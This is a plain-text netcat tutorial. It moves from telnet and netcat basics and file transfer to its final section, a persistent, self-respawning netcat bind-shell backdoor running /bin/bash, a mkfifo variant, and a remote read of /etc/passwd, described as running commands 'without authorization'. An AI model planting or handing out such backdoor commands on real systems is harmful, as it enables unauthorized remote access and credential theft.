Netcat (or nc) - open the door
Brett Lee
====================================================


If you are reading this, you have probably connected to a SMTP or HTTP port
using 'telnet' at least once in your life.  To review, 'telnet' established
a TCP connection to a port that accepts TCP; and then you enter some commands:


[root@linux ~]# telnet localhost
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[root@linux ~]#


** Nothing running on port 23.  Try port 80.
** - note: there are TWO CRs after the "GET / ..."


[root@linux ~]# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
GET / HTTP 1.1

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2008 21:40:47 GMT
Server: Apache/1.3.23 (Unix)  (Red-Hat/Linux) mod_python/2.7.6 Python/1.5.2
mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26
mod_throttle/3.1.2
Last-Modified: Wed, 12 Nov 2008 16:03:16 GMT
ETag: "77762-2852-4b041ac4"
Accept-Ranges: bytes
Content-Length: 10322
Connection: close
Content-Type: text/html

<html>
<head>
...


** Aha, we got the web page.  How about SMTP:


[root@linux ~]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 linux.domain.local ESMTP Sendmail 8.11.6/8.11.6; Thu, 13 Nov 2008 14:43:51
-0700
mail from: brett@yahoo.com
250 2.1.0 brett@yahoo.com... Sender ok
rcpt to: root
250 2.1.5 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
Here's your email...
.

^]
telnet> q
[root@linux ~]# 


** Notice how the HTTP server gracefully closed the connection for us, whereas
the SMTP server required us to do a telnet escape (CNTL-])?  How nice.  We'll
see more of that later...

Well, 'netcat' is like 'telnet' in that it allows one to establish a TCP
connection.  But 'telnet' only allows you to send TCP, not UDP.  If you want
to send UDP, netcat lets you do that also.  By default netcat uses TCP, but
with an option you can send UDP datagrams instead.


Time for some 'netcat' examples:


Let's say that you want to copy a file from a Solaris system to a Linux system,
and for some reason you don't have have scp, sftp, or any of those available.


1.  First, on the Linux system you start up a 'netcat' listener:
    Note: if you are a non-root user, you'll need to listen on a port
      greater than 1024, as port 1024 and lower are restricted.

[root@linux ~]# nc -l -p 9000


2.  Then, use 'netcat' on the sending system to write to the listener:

[root@solaris ~]# echo "Top Secret Data" | nc linux 9000

** Note that "netcat" was 'nc' on the Linux box and 'netcat' on Solaris.

** As an alternative to sending with netcat, you may be able to reach the 
   netcat listener by writing to tcp device (aka. BSD Portals). 

[root@solaris ~]# echo "Top Secret Data" > /dev/tcp/linux/9000


3.  Return to the listener and observe your output:

[root@linux ~]# nc -l -p 9000
Top Secret Data


** You'll need to send ^C if you used 'netcat' to send, otherwise
   the Portal will close the connection for you.  How nice.


4.  This time, lets perform the "file copy" mentioned earlier:

[root@linux ~]# nc -l -p 9000 > topsecret.data

and on the other system:

[root@solaris ~]# cat topsecret.file | nc linux 9000



Ok, that's some basic stuff.  If you like the idea of using Portals, or
perhaps a more advanced method to copy both text and binary files, take
a look at the wcat.sh script in this directory.


As one final 'netcat' example, we'll use wget.sh and netcat together to execute
commands on a remote system.  Netcat is copied over to the system, and commands
can be run on the 'netcat' system remotely, and without authorization.  For this
example we will be running a different version of netcat (see below).  Lastly,
lets modify the example so that there it establishes a persistent listener.


ON THE HOST YOU WILL BE CONNECTING TO:
======================================
[user1@secure1 ~]$ bash
[user1@secure1 ~]$ vi wget.sh

  (add script code from this directory)

[user1@secure1 ~]$ chmod +x wget.sh
[user1@secure1 ~]$ ./wget.sh http://linux/netcat
Saving file to netcat...
[user1@secure1 ~]$ chmod +x netcat
[user1@secure1 ~]$ ./netcat -V
netcat (The GNU Netcat) 0.7.1
Copyright (C) 2002 - 2003  Giovanni Giacobbi

This program comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of this program under the terms of
the GNU General Public License.
For more information about these matters, see the file named COPYING.

Original idea and design by Avian Research <hobbit@avian.org>,
Written by Giovanni Giacobbi <giovanni@giacobbi.net>.
[user1@secure1 ~]$ echo "./netcat -l -p 9000 -n --exec='/bin/bash; nohup ./backdoor &'" > backdoor
[user1@secure1 ~]$ chmod +x backdoor
[user1@secure1 ~]$ nohup ./backdoor &




AND FROM ANOTHER HOST:
=====================================

[root@solaris ~]# ./netcat secure1 9000
pwd
/tmp
^C[root@solaris ~]# ./netcat secure1 9000
cat /etc/passwd

...and you know what follows :)



Finally, on one of the references below, I found that you could create a backdoor
in a cleaner way using `mkfifo`:

[user1@secure1 ~]$ mkfifo backdoor
[user1@secure1 ~]$ nohup cat backdoor | /bin/bash | ./netcat -l -p 9000 > backdoor &



Additional References:
------------------------------
http://www.madirish.net/?article=184
http://netsecure.alcpress.com/netcat/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/